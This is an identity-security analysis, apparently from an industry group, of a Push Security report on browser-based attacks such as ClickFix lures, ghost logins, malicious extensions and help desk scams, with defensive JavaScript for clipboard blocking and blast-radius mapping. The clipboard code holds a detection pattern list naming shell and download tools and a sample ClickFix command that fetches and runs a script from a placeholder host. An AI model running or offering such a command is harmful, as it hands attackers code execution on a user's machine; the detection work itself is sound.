TL;DR: Identity-based attacks rose 32% last year, 97% were password-based, and ClickFix accounted for 47% of observed initial access, according to Microsoft and CrowdStrike data cited by Push Security. Browser-native phishing, malicious extensions, and help desk scams now target identity controls directly, not just endpoints.
At a glance
What this is: This is a Push Security analysis of 2025 browser-based identity attacks and the controls it built to detect phishing, ClickFix, stolen credentials, ghost logins, extensions, and help desk scams.
Why it matters: It matters because IAM, PAM, and NHI teams are now defending the browser as an identity control point, where account takeover, session theft, and delegated access abuse increasingly bypass traditional perimeter assumptions.
By the numbers:
- Identity-based attacks surged by 32% over the last year.
- ClickFix was the most common initial point of access for adversaries in the past year, accounting for 47% of observed attacks.
- In the last year-plus, 79% of detections were malware-free, up from 40% in 2019.
Context
Browser-based identity attacks are techniques that use the browser itself as the path to account takeover, credential theft, or session abuse. The article argues that this is now a mainstream problem for identity security because attackers increasingly exploit legitimate services, phishing kits, help desk workflows, and browser-native lures rather than relying on endpoint malware alone.
For IAM and identity governance teams, the shift matters because the browser is where users authenticate, approve, copy credentials, and reach business apps. That makes it a control plane for human identity and, by extension, for the workloads, integrations, and delegated access paths that depend on those credentials.
Key questions
Q: How should security teams reduce browser-based account takeover risk?
A: Security teams should treat the browser as an identity enforcement point, not just a user interface. Focus on phishing detection that understands page behaviour, enforce MFA and federated login on critical apps, block malicious clipboard activity, and govern extensions and browser profiles. The goal is to reduce the number of usable paths an attacker can exploit after a single lure or credential leak.
Q: Why do browser-based attacks bypass traditional identity controls so often?
A: They succeed because many controls were built for the login event, while the attack happens around the login event. Attackers use legitimate services, trusted lookalikes, direct app logins, and browser prompts to make the user part of the access path. If identity governance does not cover the browser layer, an attacker can obtain valid credentials or sessions without breaking central authentication.
Q: What breaks when organisations rely on passwords and MFA alone?
A: Passwords and MFA reduce some risk, but they do not stop credential reuse, session theft, malicious browser extensions, or help desk social engineering. Once an attacker has a valid session or a reused password, they can move into business apps that still accept direct login. Effective control requires visibility into where credentials are entered and where sessions can be reused.
Q: Who is accountable when a help desk scam leads to account takeover?
A: Accountability is shared across identity, support, and application owners. The help desk owns the verification process, IAM owns the policy for resets and MFA changes, and application owners own whether direct login paths and recovery flows are too permissive. If any one of those layers is weak, a scam can turn into an enterprise-wide access event.
Technical breakdown
Browser-based phishing evasion and real-time context analysis
Modern phishing does not depend only on suspicious domains or obvious fake login pages. The article describes how attackers use legitimate services, SEO poisoning, malvertising, cross-domain iframes, single-use links, and OpenID Connect flows to make malicious pages look normal long enough for a user to authenticate. That breaks legacy detection that relies on reputation alone. The technical problem is not only where the page lives, but how the browser renders trust, identity prompts, and content in real time.
Practical implication: teams need browser-level detection that evaluates page behaviour, not just static indicators.
ClickFix and malicious copy-paste as a browser-native attack path
ClickFix-style attacks turn a browser prompt into local code execution by tricking users into copying and running malicious commands. The lure often looks like a CAPTCHA or troubleshooting step, so the attack sits between social engineering and execution. Once payloads run, attackers typically aim for infostealers or remote access software that can harvest session cookies and credentials. This is hard to contain after the fact because the initial interaction happens in the browser, while the compromise may surface later in endpoint telemetry or account abuse.
Practical implication: block malicious clipboard actions before code reaches the endpoint, not after execution.
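A defender-side check for the clipboard step described above, added here as an example and not code from Push Security or the original article: it scores text a page tries to place on the clipboard, blocks ClickFix-style command hand-offs, and records the payload for investigation. The indicator list and weights, the `report` telemetry sink and the placeholder host in the constructed sample lure are all assumptions.

```javascript
// Added example, not Push Security's code. Scores text a page tries to put on the
// clipboard so a ClickFix-style lure is blocked, and the payload captured, before the
// user pastes it into a terminal or Run dialog. Indicators/weights are illustrative assumptions.
const INDICATORS = [
  // [name, pattern, weight]
  ["interpreter", /\b(powershell|pwsh|cmd(\.exe)?|mshta|wscript|cscript|bash|sh)\b/i, 2],
  ["fetch", /\b(iwr|irm|invoke-webrequest|invoke-restmethod|curl|wget|certutil)\b|https?:\/\//i, 2],
  ["execute", /\b(iex|invoke-expression|start-process)\b|\|\s*(sh|bash)\b/i, 3],
  ["stealth", /-(w(indowstyle)?\s+hidden|nop|noprofile|ep\s+bypass|executionpolicy\s+bypass|enc(odedcommand)?)\b/i, 2],
  ["lure", /#\s*(i am not a robot|verif|captcha|human)/i, 3],
];
const BLOCK_THRESHOLD = 5;  // a bare URL or a lone interpreter name is not enough to block

function assessClipboardPayload(text) {
  let score = 0;
  const reasons = [];
  for (const [name, re, weight] of INDICATORS) {
    if (re.test(text)) { score += weight; reasons.push(name); }
  }
  return { score, reasons, block: score >= BLOCK_THRESHOLD };
}

// Browser side (must run in the page's main world, e.g. injected by a managed extension):
// guard both ways a page can write the clipboard and send the payload to `report`, an
// assumed telemetry sink, so responders get evidence at the point of user interaction.
function installClipboardGuard(win, report) {
  const check = (text) => {
    const verdict = assessClipboardPayload(String(text));
    if (verdict.block) {
      report({ kind: "clickfix-clipboard-blocked", page: win.location.href, payload: String(text), ...verdict });
    }
    return verdict.block;
  };
  // Path 1: async Clipboard API.
  const writeText = win.navigator.clipboard.writeText.bind(win.navigator.clipboard);
  win.navigator.clipboard.writeText = (text) =>
    check(text) ? Promise.reject(new Error("clipboard write blocked by policy")) : writeText(text);
  // Path 2: legacy execCommand('copy') with clipboardData.setData() inside a copy handler.
  const setData = win.DataTransfer.prototype.setData;
  win.DataTransfer.prototype.setData = function (type, data) {
    if (type.startsWith("text") && check(data)) return;  // drop the payload, keep the event
    return setData.call(this, type, data);
  };
}

// Constructed sample: the "verification" command a CAPTCHA-style lure hands the user (placeholder host).
const SAMPLE_LURE = 'powershell -w hidden -c "irm https://placeholder.invalid/verify | iex" # I am not a robot';
const BENIGN_COPY = "git clone https://github.com/example/repo.git";
```

In a real deployment the threshold and indicator set should be tuned against the organisation's own copy traffic, since developer-heavy teams legitimately copy shell commands.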
Stolen credentials, ghost logins, and browser extension risk
The article ties together several identity abuse paths: stolen credentials used against apps like Jira, ghost logins where users authenticate directly to apps that should be federated, and malicious or compromised browser extensions. These are different mechanisms, but they all exploit weak identity enforcement at the browser layer. If MFA is missing, passwords are reused, or extensions are over-permissioned, the attacker gets a usable login path without needing to defeat the core identity provider first.
Practical implication: enforce federation, MFA, and extension governance across every user app, not just the IdP.
Threat narrative
Attacker objective: The attacker wants durable access to business applications and sessions that can be monetised through data theft, extortion, or broader account takeover.
- Entry begins in the browser through phishing, malvertising, SEO poisoning, or malicious copy-and-paste lures that look like normal login or troubleshooting flows.
- Escalation occurs when the attacker captures credentials, session cookies, or local access through stolen logins, ClickFix execution, ghost logins, or compromised browser extensions.
- Impact follows when the attacker reuses those identities to access business apps, dump data, hold it for ransom, or expand the blast radius across shared passwords and connected services.
Breaches seen in the wild
- Cisco Active Directory credentials breach — Kraken ransomware group leaked Cisco Active Directory credentials.
- MongoBleed breach — MongoBleed exposed secrets across 87K MongoDB servers.
Read our 52 NHI Breaches Analysis report for a comprehensive view of breaches impacting Non-Human Identities including AI Agents.
NHI Mgmt Group analysis
Browser-based identity attack is now the right category for this problem. The article is not describing isolated phishing or endpoint malware trends. It is showing that the browser has become the place where identity trust is created, abused, and extended across apps, sessions, and help desk workflows. That makes browser security an identity governance issue, not just a user protection issue. Practitioners should treat the browser as a governed control surface, not a passive client.
Ghost logins expose a federation failure, not just a password problem. When users can still authenticate directly to valuable apps that should be behind SAML or OIDC, the environment has a parallel access path that identity governance does not fully own. This creates an accountability gap between central identity policy and app-level reality. The implication is that access governance must include the actual login method, not only the presence of an IdP.
Credential reuse converts one phished account into a broader identity event. The article's blast-radius discussion shows that a stolen browser credential can expose multiple apps when passwords are shared or synced across profiles. That is a governance problem because the control boundary is no longer the individual application. Practitioners need to map where browser authentication creates cross-app coupling, because that is where one compromise becomes many.
Help desk verification has become part of identity proofing, whether teams recognise it or not. The Marks & Spencer and Jaguar Land Rover cases show that support staff can become an access-control bypass if they do not have a reliable way to verify the person on the other end. That makes service desk identity checks a governance control, not an operational courtesy. Teams should treat assisted recovery and MFA reset paths as privileged workflows with explicit assurance requirements.
Browser telemetry creates an identity blast radius concept that most IAM programmes still lack. The most useful insight here is not simply that attacks are browser-based, but that the browser can reveal which accounts, apps, and sessions are adjacent to a compromise. That gives security teams a practical way to think about the spread of identity risk across the enterprise. The practitioner takeaway is to govern by blast radius, not by single-account events.
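One way to turn the ghost-login, credential-reuse and blast-radius points above into something a governance team can run, added here as an example and not code from Push Security or this page: it takes constructed browser login telemetry, flags local-password logins to apps that policy says must be federated, and sizes how many accounts a single phished credential would expose. The event shape, the salted password fingerprint, the `SSO_REQUIRED` policy set and all sample values are assumptions.

```javascript
// Added example, not Push Security's code: find ghost logins and size the blast
// radius of one phished credential from browser login telemetry. Assumed shape: the
// browser agent records one event per observed login with a salted fingerprint of the
// password entered (never the password itself); apps in SSO_REQUIRED must be federated.
const SSO_REQUIRED = new Set(["jira", "confluence", "github"]);  // assumed federation policy

const EVENTS = [  // constructed sample telemetry
  { user: "amy", app: "jira", method: "password", pwFingerprint: "f1" },          // ghost login
  { user: "amy", app: "jira", method: "sso", pwFingerprint: null },
  { user: "amy", app: "vendor-portal", method: "password", pwFingerprint: "f1" }, // same password
  { user: "amy", app: "confluence", method: "sso", pwFingerprint: null },
  { user: "bob", app: "github", method: "password", pwFingerprint: "f2" },        // ghost login
  { user: "bob", app: "crm", method: "password", pwFingerprint: "f2" },
  { user: "team-ops", app: "monitoring", method: "password", pwFingerprint: "f1" }, // shared with amy
];

// A ghost login is a local-password login to an app that policy says must use SSO.
// Returns one entry per user/app pair, in first-seen order.
function findGhostLogins(events, ssoRequired) {
  const out = new Map();
  for (const e of events) {
    if (e.method === "password" && ssoRequired.has(e.app)) {
      out.set(`${e.user}@${e.app}`, { user: e.user, app: e.app });
    }
  }
  return [...out.values()];
}

// Blast radius of the credential used for user@app: every account where the same
// password fingerprint was entered, across users (shared or synced passwords).
function blastRadius(events, user, app) {
  const fps = new Set(events
    .filter((e) => e.user === user && e.app === app && e.pwFingerprint)
    .map((e) => e.pwFingerprint));
  const reach = new Map();
  for (const e of events) {
    if (fps.has(e.pwFingerprint)) reach.set(`${e.user}@${e.app}`, { user: e.user, app: e.app });
  }
  return [...reach.values()];
}

// Governance view: each ghost login with the number of accounts it exposes, so
// exceptions can be prioritised by reach rather than treated as single-account events.
function ghostLoginReport(events, ssoRequired) {
  return findGhostLogins(events, ssoRequired).map(({ user, app }) => ({
    user, app, reach: blastRadius(events, user, app).length,
  }));
}
```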
From our research:
- 80% of identity breaches involved compromised non-human identities such as service accounts and API keys, according to Ultimate Guide to NHIs.
- Only 20% have formal processes for offboarding and revoking API keys, and even fewer have procedures for rotating them, according to Ultimate Guide to NHIs.
- For a broader breach lens, see 52 NHI Breaches Analysis, which maps recurring identity failure patterns across real incidents.
What this signals
Browser-layer identity governance is becoming a practical control requirement, not an optional hardening task. As phishing kits, ClickFix lures, and ghost logins converge, teams will need policy that covers the browser, the IdP, and the application login path together. The programme signal is clear: if you cannot see where credentials are entered and reused, you cannot explain your blast radius after an attack.
Identity assurance is moving toward behaviour-aware enforcement. Static trust markers such as domain reputation are no longer enough when attackers abuse legitimate services and trusted login surfaces. Practitioners should expect more emphasis on browser telemetry, session context, extension governance, and help desk verification as part of a single access-risk model.
With 71% of NHIs not rotated within recommended time frames, per Ultimate Guide to NHIs, Static vs Dynamic Secrets, identity teams already struggle with lifecycle control across machine access. The browser trend extends that same governance problem into human access paths, where session persistence and credential reuse can spread compromise faster than review cycles can react.
For practitioners
- Govern the browser as an identity control plane: Inventory which authentication, password entry, clipboard, extension, and help desk actions happen in the browser, then decide which of them must be centrally observed and blocked. Tie browser telemetry to account risk so identity teams can see when a user interaction becomes an access event.
- Remove ghost login paths from critical apps: Find apps that still accept local credentials, especially where federation should be mandatory, and eliminate direct login options where possible. If exceptions remain, track them as explicit policy debt and review them alongside SSO coverage gaps and MFA gaps.
- Treat clipboard execution as a security boundary: Block malicious copy-and-paste patterns before code reaches the endpoint, and capture the clipboard payload for investigation when a ClickFix-style lure is detected. This gives responders evidence at the point of user interaction instead of forcing them to reconstruct the attack after compromise.
- Enforce browser extension governance by permission and profile: Review installed extensions, sideloaded installs, risky permissions, and company-domain browser profiles together rather than as separate issues. Extensions should be governed as identity-adjacent software because they can observe sessions, collect input, and weaken the assurance of the browser environment.
Key takeaways
- Browser-based attacks now exploit identity trust directly, so identity governance must extend into the browser rather than stopping at the login page.
- The evidence points to a broad shift away from malware-heavy intrusion and toward credential, session, and support-channel abuse that expands blast radius across apps.
- Teams that control federation, clipboard execution, extensions, and recovery workflows will reduce more account-takeover risk than teams that rely on user awareness alone.
Standards & Framework Alignment
This section maps relevant standards and security frameworks to the operational risks and controls described in this guidance.
The OWASP Non-Human Identity Top 10 addresses the attack and risk surface, while NIST CSF 2.0 and NIST Zero Trust (SP 800-207) set the governance and control requirements practitioners need to meet.
| Framework | Control / Reference | Relevance |
|---|---|---|
| OWASP Non-Human Identity Top 10 | NHI-01 | Covers credential exposure and account takeover patterns used in browser-based attacks. |
| NIST CSF 2.0 | PR.AC-4 | Browser login paths and app access enforcement map to access control governance. |
| NIST Zero Trust (SP 800-207) | PR.AC | Zero trust requires continuous verification across browser, session, and app access. |
Apply zero trust principles to browser sessions and verify access continuously, not only at sign-in.
Key terms
- Browser-based account takeover: A takeover pattern where the browser becomes the main path to steal credentials, sessions, or approval actions. Instead of attacking the endpoint first, the adversary uses phishing, trusted lookalikes, or malicious browser behaviour to obtain usable access to business applications.
- Ghost login: A direct application login that bypasses the intended federated identity path. It usually appears when users can still authenticate with local passwords on apps that should rely on SSO or OIDC, creating a shadow access route that weakens central policy and expands takeover risk.
- ClickFix attack: A social engineering technique that tricks a user into copying and running malicious commands from a browser page. The lure often looks like a CAPTCHA or help prompt, but the real objective is code execution that enables credential theft, session capture, or remote access.
- Browser extension governance: The practice of controlling which extensions users can install, what permissions they receive, and how they are monitored in managed browser profiles. In identity security, extensions matter because they can observe sessions, capture input, and weaken the trust boundary around authentication.
Deepen your knowledge
NHI governance, agentic AI identity, and machine identity lifecycle are core topics in our NHI Foundation Level course, the industry's only accredited NHI security programme. If you are responsible for identity security strategy or NHI governance in your organisation, it is worth exploring.
This post draws on content published by Push Security: browser-based identity attacks, ClickFix, stolen credentials, and help desk scams. Read the original.
Published by the NHIMG editorial team on 2025-12-17.
NHI Mgmt Group — the independent authority on Non-Human Identity, IAM, and Agentic AI security. nhimg.org